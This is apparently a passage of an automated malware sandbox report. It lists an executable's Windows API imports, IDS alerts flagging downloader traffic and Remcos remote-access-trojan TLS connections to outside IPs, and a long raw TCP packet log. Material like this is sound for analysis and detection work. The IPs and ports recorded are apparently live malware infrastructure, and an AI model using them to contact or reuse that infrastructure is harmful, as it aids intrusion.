                                          RT_MANIFEST0xc7f900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                          Imports

                                          DLLImport
                                          KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                          USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-09-30T13:59:43.556757+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449737192.3.220.2280TCP
                                          2024-09-30T13:59:47.052624+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449738107.173.4.162404TCP
                                          2024-09-30T13:59:48.146382+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449739107.173.4.162404TCP
                                          2024-09-30T13:59:48.254608+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449740178.237.33.5080TCP
                                          2024-09-30T13:59:55.947608+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449741107.173.4.162404TCP
                                          2024-09-30T13:59:55.958911+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449742107.173.4.162404TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 30, 2024 13:59:43.065984011 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.070868969 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.070946932 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.071100950 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.075968027 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556668997 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556685925 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556713104 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556735039 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556744099 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556756020 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556756973 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.556756973 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.556768894 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556780100 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556783915 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.556791067 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.556792021 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556804895 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.556828022 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.556843042 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.561681986 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.561748028 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.561783075 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.561820030 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.561870098 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.561882973 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.561912060 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.647283077 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647296906 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647319078 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647330999 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647351980 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.647351980 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.647365093 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647372961 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.647413015 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.647614002 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647670031 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.647774935 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647787094 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647799015 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647810936 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647820950 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.647824049 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.647846937 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.647892952 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.648612976 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.648626089 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.648647070 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.648658037 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.648658037 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.648669004 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.648670912 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.648690939 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.648716927 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.649283886 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.649307966 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.649318933 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.649327993 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.649343967 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.649362087 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.649362087 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.649374008 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.649399996 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.649419069 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.650166035 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.650188923 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.650198936 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.650213003 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.650230885 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.650254011 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.652132988 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.652179003 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.740844965 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.740863085 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.740875006 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.740897894 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.740921974 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.740927935 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.740938902 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.740950108 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.740961075 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.740966082 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741008043 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741147995 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741163015 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741174936 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741185904 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741199017 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741199017 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741210938 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741226912 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741255999 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741264105 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741301060 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741329908 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741343021 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741369963 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741389036 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741400003 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741400957 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741410971 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741421938 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741430044 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741439104 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741450071 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741461039 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741461039 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741487026 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741506100 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741523981 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741540909 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741554022 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.741564989 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.741600037 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742209911 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742254019 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742261887 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742265940 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742295980 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742311001 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742312908 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742322922 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742333889 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742345095 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742357016 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742357016 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742384911 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742424011 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742479086 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742491007 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742501974 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742512941 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742525101 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.742525101 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742563009 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.742571115 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.743170023 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743210077 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.743223906 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743237019 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743263960 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.743283987 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.743294954 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743305922 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743324995 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743335962 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.743336916 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743349075 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743359089 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.743359089 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.743408918 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.743421078 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.831543922 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831558943 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831571102 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831595898 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831608057 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831618071 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831629038 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831640005 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831665993 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831676960 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831687927 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831743002 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.831763983 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831774950 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831785917 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831809044 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.831830978 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.831847906 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831885099 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831887007 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.831896067 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831919909 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.831923962 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.831952095 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.831967115 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832081079 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832093000 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832113028 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832124949 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832132101 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832140923 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832151890 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832168102 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832186937 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832189083 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832202911 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832226992 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832257032 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832487106 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832499027 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832509995 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832530022 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832560062 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832560062 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832572937 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832585096 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832597017 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832606077 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832629919 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832645893 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832658052 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832663059 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832669020 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832680941 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832690001 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832693100 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.832712889 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.832743883 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833158016 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833170891 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833182096 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833210945 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833220959 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833234072 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833245039 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833250046 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833256006 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833290100 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833301067 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833312035 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833319902 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833323002 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833339930 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833352089 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833354950 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833389044 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833800077 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833811998 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833822966 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833873034 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833884001 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833884954 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833894968 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.833909988 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.833944082 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.921924114 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.921950102 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.921966076 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.921997070 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.921998024 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922008991 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922022104 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922024965 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922036886 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922068119 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922079086 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922089100 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922090054 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922101021 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922137022 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922147989 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922152042 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922152042 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922293901 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922307014 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922310114 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922317982 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922334909 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922344923 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922357082 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922365904 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922368050 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922379017 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922399998 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922429085 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922477961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922489882 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922524929 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922637939 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922666073 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922678947 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922683001 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922710896 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922728062 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922756910 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922770023 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922780037 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922791958 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922806025 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922832966 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922836065 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922843933 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922856092 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922867060 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.922868967 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922894001 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.922928095 CEST4973780192.168.2.4192.3.220.22
